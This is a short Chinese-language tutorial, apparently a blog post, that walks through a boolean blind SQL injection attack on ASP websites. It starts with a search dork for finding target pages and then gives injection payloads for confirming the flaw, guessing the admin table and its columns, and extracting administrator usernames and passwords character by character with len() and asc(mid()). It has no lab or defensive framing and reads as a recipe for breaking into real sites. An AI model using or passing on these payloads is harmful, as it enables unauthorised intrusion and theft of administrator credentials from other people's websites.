首先用命令:inurl:{asp=1234} 检测一些有这样格式的文章(里面的1234可以替换其它数字。)

1、检测网站是否存在注入点;

命令:and 1=1(页面正常) 或 and 1=2(页面错误)

2、猜测是否存在adminmanagerusers等相关命名的管理员表;

命令:and exists(select * from admin)

3、检测有哪些id值,方便根据id对用户名进行破译,相关id值可以替换;

命令:and exists(select id from admin where id =1)

4、检测“用户名”的字段名称,user_name字段可以替换;

命令:and exists(select user_name from admin)

5、检测“密码”的字段名称,password字段可以替换;

and exists(select password from admin)

6、判断相应id(1)的用户名长度,返回正常页面证明成功;

用户名长度小于10

and exists(select user_name from admin where len(user_name)<10 and id=1)

用户名长度大于10

and exists(select user_name from admin where len(user_name)>10 and id=1)

7、判断相应id(1)的密码长度,返回正常页面证明成功;

密码长度小于16and exists(select password from admin where len(password)<16 and id=1)

密码长度大于16and exists(select password from admin where len(password)>16 and id=1)

判断用户名和密码长度的时候均可采用二分法方法来提高猜解效率;

8、猜测用户名asc(mid(user_name,1,1)),这里猜测第一位,可以先判断是否汉字,返回正常页面证明成功;

判断是否汉字:

and exists(select user_name from admin where id=20 and asc(mid(user_name,1,1))<0)

命令:and exists(select user_name from admin where id=1 and asc(mid(user_name,1,1))>97)

ascii码:大写A65,小写a97,数字048;汉字具体ascii码要查表

9、接下来用同样方法猜测密码,要是密码采用MD5加密,那只能够用工具解密了。




Jankie_俊健.
-----------------------------------------------------------